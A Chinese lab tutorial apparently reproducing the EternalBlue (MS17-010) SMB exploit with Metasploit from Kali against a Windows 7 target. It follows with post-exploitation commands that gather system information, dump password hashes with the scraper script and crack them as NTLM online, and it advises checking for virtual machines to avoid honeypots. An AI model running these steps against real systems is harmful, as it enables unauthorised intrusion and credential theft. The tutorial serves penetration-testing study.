永恒之蓝复现

一、永恒之蓝漏洞简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、实验环境

kali linux(攻击者)
windows 7(靶机)

三、实验步骤

1.首先打开终端切换到root权限,这次我们使用到msfconsole(msfconsole 是 Metasploit 框架控制台的缩写,是一个功能强大且广泛使用的开源渗透测试框架)

2.然后我们查看一下win7的IP

3.到kail   输入search ms17-010永恒之蓝复现_第1张图片

我们发现有这么多模块ms17-010也就是永恒之蓝 这个漏洞进行攻击,在这里我们选择这个模块,用show options 来查看我们需要设置什么东西,永恒之蓝复现_第2张图片

 这样我们就设置好了要攻击的靶机IP,接下来我们看一下其他参数还有什么问题,好了没有问题就run一下永恒之蓝复现_第3张图片

出现了这个玩意就代表我们攻击成功了永恒之蓝复现_第4张图片

 这个是我们win7的ip。

4。接下里我们就来做后渗透,信息收集getuid永恒之蓝复现_第5张图片

 这个system,是有system权限一般来说都是只要管理员权限我们就要进行提权,想要从管理员提升到system权限就要用到getsystem

查看磁盘情况:

run post/windows/gather/forensics/enum_drives

永恒之蓝复现_第6张图片

检查是否为虚拟机:

 run post/windows/gather/checkvm 

为什么要检查它是不是虚拟机呢,因为在渗透测试的过程中可能会碰到一种技术叫蜜罐,大多数的蜜罐都是布置在虚拟机里面的,如果你一番操作下来拿到了权限但是是虚拟机那就没啥用处,及时止损

查看服务:

run post/windows/gather/enum_services 

永恒之蓝复现_第7张图片

 列举有啥应用:

run post/windows/gather/enum_applications 

永恒之蓝复现_第8张图片

 列举有啥操作:(新建一个文件夹看看有啥变化)

run post/windows/gather/dumplinks 

一键扫描并且整理好:

run scraper

并放入隐藏文件夹里面: cd /root/.msf4/logs/scripts/scraper (ls查看一下)

cat hashes.txt查看一下

查出来的密文可以用www.cmd5.com查看一下,格式是NTLM。

乱码解决方法:

输入chcp 65001可将乱码解决

你可能感兴趣的:(安全)